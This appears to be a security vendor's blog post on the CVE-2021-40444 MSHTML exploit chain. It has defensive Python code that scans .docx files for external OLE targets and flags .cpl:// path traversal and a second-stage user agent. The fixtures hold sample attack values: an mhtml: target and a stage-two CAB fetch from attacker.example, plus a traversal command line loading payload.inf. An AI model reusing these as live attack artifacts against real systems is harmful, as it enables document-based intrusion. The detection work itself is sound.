A recently discovered exploit targeting a vulnerability in MSHTML, the browser engine that Microsoft embeds in Windows and that Office relies on to render HTML content, could become a prolific tool for cybercriminals in both targeted and wide-spread campaigns. CVE-2021-40444, a remote code execution vulnerability in MSHTML, was disclosed by Microsoft in an advisory of 07 September 2021 [1], but a malicious document from the exploit chain had been discovered separately by security researchers a week earlier. Public analysis of that document has led to multiple proof-of-concept exploits that are now widely available. Despite the availability and ease of use of the exploit, any attack chain built on it generates noticeably anomalous behaviour on the target machine.

According to Microsoft's 15 September analysis of the exploit chain [2], attacks using the exploit were first observed in August 2021: emails posing as legal agreements led the victim to the malicious document on a file-sharing site. Once the document was opened, malicious JavaScript contained in a separately hosted file was loaded through an external OLEObject relationship. The exploit allowed the attack to circumvent Protected Mode in Microsoft Office, so no additional interaction from the victim was required. From there, a remotely hosted CAB file containing a DLL posing as an INF file was downloaded, decompressed and loaded; the DLL in turn fetched a custom Cobalt Strike Beacon loader.
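The external OLEObject relationship is the first artefact a defender can check for without opening the document. The following Python script is an added example, not code from Microsoft or ReaQta: it builds a minimal .docx in memory (a constructed fixture; the attacker hostname and the exact target string are placeholders) and lists every oleObject relationship whose TargetMode is "External", flagging those that point at a network URL such as an mhtml: or http: target.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Relationship type Office uses for OLE objects in word/_rels/*.rels
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
PKG_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def external_ole_targets(docx_bytes: bytes) -> list:
    """Return the Target of every oleObject relationship marked TargetMode="External".

    A benign embedded OLE object points at a part inside the package (TargetMode
    omitted or "Internal"). An external target means Word will fetch remote content
    when the document is opened, which is what the observed chain relied on.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        # Main document relationships; headers and footers carry their own .rels parts
        rels_parts = [n for n in zf.namelist()
                      if n.startswith("word/_rels/") and n.endswith(".rels")]
        for name in rels_parts:
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(PKG_NS + "Relationship"):
                if (rel.get("Type") == OLE_REL_TYPE
                        and rel.get("TargetMode", "Internal") == "External"):
                    hits.append(rel.get("Target", ""))
    return hits


def is_network_target(target: str) -> bool:
    """True for targets fetched over the network (mhtml:, http:, https:)."""
    return re.match(r"(?i)^(mhtml:|https?:)", target) is not None


def scan(docx_bytes: bytes) -> list:
    """External OLE targets that reach out to the network: the ones worth alerting on."""
    return [t for t in external_ole_targets(docx_bytes) if is_network_target(t)]


def build_docx(rels_xml: str) -> bytes:
    """Construct a minimal .docx containing the given document relationships (fixture only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>')
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed fixtures. The external target below imitates the shape of a weaponised
# document (hostname is a placeholder); the benign one embeds an ordinary internal object.
MALICIOUS_TARGET = "mhtml:http://attacker.example/word.html!x-usc:http://attacker.example/word.html"
MALICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{OLE_REL_TYPE}" Target="{MALICIOUS_TARGET}" TargetMode="External"/>
</Relationships>"""

BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="{OLE_REL_TYPE}" Target="embeddings/oleObject1.bin"/>
</Relationships>"""


if __name__ == "__main__":
    for label, rels in (("malicious", MALICIOUS_RELS), ("benign", BENIGN_RELS)):
        print(label, scan(build_docx(rels)))
```

Run against a real file with `scan(open(path, "rb").read())`; an empty list means no externally sourced OLE object was declared in the document's relationship parts, which does not by itself prove the file is clean.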


The exploit is not technically challenging to deploy, and since it became known to the broader public several proof of concepts have been released, including worked examples that make customisation relatively easy. Because MSHTML is present in every Microsoft Windows installation, the exploit remains effective on any unpatched system. Its availability and reach will likely make it a common tool among attackers running wide-spread malicious email campaigns.

Analyzing the exploits

ReaQta analysed the use of both the exploits found in the wild and the proof of concepts available to the public, and found glaring red flags in the telemetry immediately, including techniques catalogued in the MITRE ATT&CK framework such as T1129, Shared Modules.

ReaQta mapped the use of exploits to the MITRE ATT&CK Framework

To load the module, the attack leverages Microsoft's URL protocol handler for Control Panel files, ".cpl://", followed by a relative path traversal. Quite apart from the module load itself, the use of .cpl:// in a URL is conspicuous, and its use to load an INF file even more so.

Beyond the very unusual activity around loading the malicious module, the overall behaviour of Microsoft Office during the attack produces numerous actions that resemble known techniques mapped to the MITRE ATT&CK framework, as well as spawning child processes.

The attack chain generates numerous events mapped to known techniques.

Even on a system without the patch for CVE-2021-40444, exploits of this kind, including those against zero-day vulnerabilities, cannot run without generating activity on the target machine that is highly anomalous and therefore detectable by an effective EDR. Attackers must first work to evade standard security features of the OS, such as the additional warnings and restrictions that Protected Mode imposes on users, and living-off-the-land attacks depend on atypical use of the legitimate tools and protocols available on the target machine. The attack cycle also does not end with successful exploitation of CVE-2021-40444: the attackers must still carry out follow-on activity to gain wider access to the target's network.


In-depth monitoring and threat detailing with ReaQta-Hive

ReaQta-Hive is designed to detect such activity immediately, and the threat can be characterised more precisely with ReaQta's DeStra engine. DeStra adds a further layer of monitoring, letting blue teams craft simple yet powerful correlations on top of the insights collected by the Hive agents. While exploits against CVE-2021-40444 already trigger alerts in Hive, a DeStra rule can label the specific attack in an alert: in this case by matching the user agent observed in the HTTP request for the second-stage payload ("Microsoft Office Discovery Protocol"), or by matching the use of .cpl:// with a relative path traversal in the command line of an event.
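The two indicators named above, the .cpl:// URL with a relative path traversal in a command line and the second-stage user agent, are easy to express as rules over endpoint telemetry. The Python below is an added example written for this page, not a DeStra rule or ReaQta-Hive code: the event schema, the event values and the process names in the fixtures are constructed assumptions, and the regex also accepts the shorter ".cpl:../" spelling in case the handler appears without the double slash. It runs both rules over the sample events and then correlates the findings into a single chain label, which is the kind of correlation the paragraph describes.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    event_id: int
    evidence: str


# Constructed telemetry fixtures (schema and values are assumptions for this example):
# "process" events carry a command line, "http" events carry an outbound request's user agent.
EVENTS = [
    {"id": 1, "kind": "process", "parent": "WINWORD.EXE", "image": "control.exe",
     "cmdline": 'control.exe ".cpl://../../../AppData/Local/Temp/Low/payload.inf"'},
    {"id": 2, "kind": "http", "image": "WINWORD.EXE",
     "url": "http://attacker.example/stage2.cab",
     "user_agent": "Microsoft Office Discovery Protocol"},
    # Legitimate Control Panel use: a .cpl file name, not a .cpl: URL, and no traversal
    {"id": 3, "kind": "process", "parent": "explorer.exe", "image": "control.exe",
     "cmdline": "control.exe timedate.cpl"},
    {"id": 4, "kind": "http", "image": "WINWORD.EXE", "url": "https://www.example.com/",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"},
]

# Rule 1: a .cpl: URL followed by at least one "../" segment anywhere in the command line.
# The page writes the handler as ".cpl://"; "/{0,2}" keeps ".cpl:../" matched too (assumption).
CPL_TRAVERSAL = re.compile(r"\.cpl:/{0,2}(?:\.\./)+", re.IGNORECASE)

# Rule 2: the user agent the page reports for the second-stage HTTP request.
SUSPECT_USER_AGENT = "Microsoft Office Discovery Protocol"


def check_process(ev: dict):
    """Flag a process event whose command line carries a .cpl: URL with path traversal."""
    m = CPL_TRAVERSAL.search(ev.get("cmdline", ""))
    return Finding("cpl-url-path-traversal", ev["id"], m.group(0)) if m else None


def check_http(ev: dict):
    """Flag an HTTP event that uses the second-stage user agent."""
    if ev.get("user_agent", "") == SUSPECT_USER_AGENT:
        return Finding("office-discovery-user-agent", ev["id"], ev.get("url", ""))
    return None


def run_rules(events: list) -> list:
    """Apply the rule matching each event's kind and collect the findings in event order."""
    findings = []
    for ev in events:
        f = None
        if ev["kind"] == "process":
            f = check_process(ev)
        elif ev["kind"] == "http":
            f = check_http(ev)
        if f is not None:
            findings.append(f)
    return findings


def correlate(findings: list):
    """Label the chain when both indicators are present; a lone hit keeps its own rule name."""
    rules = {f.rule for f in findings}
    if {"cpl-url-path-traversal", "office-discovery-user-agent"} <= rules:
        return "CVE-2021-40444 exploit chain"
    return next(iter(rules)) if rules else None


if __name__ == "__main__":
    hits = run_rules(EVENTS)
    for f in hits:
        print(f"[{f.rule}] event {f.event_id}: {f.evidence}")
    print("correlated:", correlate(hits))
```

A production rule would additionally scope the correlation to one host and a short time window and carry the Office parent process as context; both indicators are cheap to add to an existing command-line and proxy-log pipeline.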

References:

[1] Microsoft. 2021. "Microsoft MSHTML Remote Code Execution Vulnerability." Microsoft Security Response Center.

[2] Microsoft. 2021. "Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability." Microsoft Threat Intelligence Center.

To learn more about what makes ReaQta unique, please visit Why ReaQta and apply for a demonstration.
